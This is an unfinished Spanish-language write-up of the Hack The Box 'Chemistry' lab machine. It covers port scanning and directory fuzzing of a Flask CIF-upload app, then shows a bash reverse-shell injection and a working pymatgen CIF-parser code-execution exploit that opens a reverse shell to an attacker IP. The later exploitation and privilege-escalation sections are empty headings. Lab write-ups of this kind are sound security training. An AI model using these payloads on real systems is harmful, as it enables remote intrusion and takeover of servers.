🟢Chemistry (WIP)

En esta ocasión vamos a hacer el writeup de la máquina Chemistry de Hack the Box, una máquina Linux de dificultad easy.

Primer acceso

Añadimos la IP 10.10.11.38 a nuestro /etc/hosts y accedemos través del navegador.

sudo echo "10.10.11.38 chemistry.htb" | sudo tee -a /etc/hosts

Esta máquina no tiene abierto el puerto 80 por lo que vamos a comprobar los puertos y servicios que tiene corriendo.

Escaneo de puertos

sudo nmap -v -sV -sS -T5 10.10.11.38 

PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp
6000/tcp open  X11
8000/tcp open  http-alt

Nos encontramos varios puertos abiertos. Nos interesa el puerto 5000, por lo que vamos a escanearlo más en detalle con Nmap:

sudo nmap -v -sCV -p 5000 -T5 10.10.11.38

PORT     STATE SERVICE VERSION
5000/tcp open  upnp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.9.5
|     Date: Thu, 07 Nov 2024 21:15:55 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 719
|     Vary: Cookie
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Chemistry - Home</title>
|     <link rel="stylesheet" href="/static/styles.css">
|     </head>
|     <body>
|     <div class="container">
|     class="title">Chemistry CIF Analyzer</h1>
|     <p>Welcome to the Chemistry CIF Analyzer. This tool allows you to upload a CIF (Crystallographic Information File) and analyze the structural data contained within.</p>
<-----SNIP----->

Encontramos que el puerto 5000 usa una versión de Werkzeug/3.0.3 que puede ser vulnerable.

Puerto 22

Es el puerto típico SSH. Aqui podríamos:

• Realizar ataques de fuerza bruta para probar credenciales de acceso (Hydra, Medusa, CrackMapExec)

• Comprobar versiones de SSH para vulnerabilidades conocidas (Nmap, ssh-audit)

• Enumerar usuarios o configuraciones inseguras (Enum4linux, Nmap)

Puerto 5000

Al acceder por el puerto 5000 nos encontramos un frontal con 2 CTAs: login y registro. En la pantalla de login podríamos probar a hacer un bruteforce con Hydra, pero vamos a intentar registrarnos:

Al registrarnos en la página llegamos a un dashboard donde podríamos subir un archivo .CIF y encima nos da un link a un archivo CIF de ejemplo:

Vamos a abrir el archivo .cif a ver que contiene:

afsh4ck@kali$ cat example.cif 

data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1

Un archivo .cif (Crystallographic Information File) es un formato de texto utilizado principalmente en la química y la cristalografía para almacenar información estructural de cristales. El archivo .cif contiene datos sobre la estructura de una molécula o un cristal, incluidos detalles como las dimensiones de la celda unitaria, los ángulos, las posiciones de los átomos y otros parámetros relacionados con la cristalografía.

Cómo podría explotarlo un atacante

Si un servidor permite subir archivos .cif, es posible que un atacante intente explotar vulnerabilidades relacionadas con la forma en que el servidor procesa y analiza estos archivos. Aquí tienes algunos posibles vectores de ataque:

1. Inyección de Comandos en los Metadatos

Algunos sistemas pueden procesar los archivos .cif mediante scripts de shell o lenguajes como Python o PHP. Si el sistema no sanitiza correctamente los valores de los campos dentro del archivo, podrías intentar insertar comandos en uno de los campos de metadatos.

Por ejemplo, podrías modificar uno de los valores de tu archivo .cif para inyectar un comando de shell, como una reverse shell en Bash:

_cell_length_a    10.00000; bash -i >& /dev/tcp/<IP_DEL_ATACANTE>/4444 0>&1;

2. Modificar el archivo .cif para introducir una reverse shell

data_Example
_cell_length_a    10.00000; bash -i >& /dev/tcp/10.10.14.254/4444 0>&1;
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1

Al abrir un listener con netcat por el puerto 4444 y subir el archivo al servidor, vemos que en principio no nos devuelve ninguna conexión, y al abrir el archivo da un error del servidor:

Vamos a buscar el directorio de subidas donde se almacenan los archivos subidos.

Fuzzing

Haciendo fuzzing nos encontramos unos pocos directorios, entre ellos el directorio de subidas /upload:

afsh4ck@kali$ dirsearch -u http://10.10.11.38:5000

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/Escritorio/machines/hbt/Chemistry/reports/http_10.10.11.38_5000/_24-11-07_21-31-54.txt

Target: http://10.10.11.38:5000/

[21:31:54] Starting: 
[21:32:34] 302 -  235B  - /dashboard  ->  /login?next=%2Fdashboard
[21:32:51] 200 -    1KB - /login
[21:32:51] 302 -  229B  - /logout  ->  /login?next=%2Flogout
[21:33:08] 200 -    1KB - /register
[21:33:23] 405 -  153B  - /upload

Task Completed

El estatus 405 hace referencia a un código de error en el protocolo HTTP, específicamente "405 Method Not Allowed" (Método No Permitido). Este error ocurre cuando un cliente realiza una solicitud utilizando un método HTTP que el servidor no permite para el recurso solicitado.

Por ejemplo si un cliente intenta realizar una solicitud POST a una URL que solo acepta GET, el servidor puede responder con un código 405, indicando que el método POST no está permitido en esa ruta.

Búsqueda de exploits

Buscando cif exploit no encontramos este repositorio en Github que nos podría servir:

Arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_stringGitHub

Revisando el código del repo con detenimiento, podemos modificar un archivo cif para inyectarle un reverse shell de la siguiente manera:

Importante cambiar nuestra IP y puerto al final de la línea

exploit.cif

data_5yOhtAoR
_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("bash -i >& /dev/tcp/TU_IP/TU_PUERTO 0>&1");0,0,0'

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

Explotación

Conexión a base de datos

User flag

Escalada de privilegios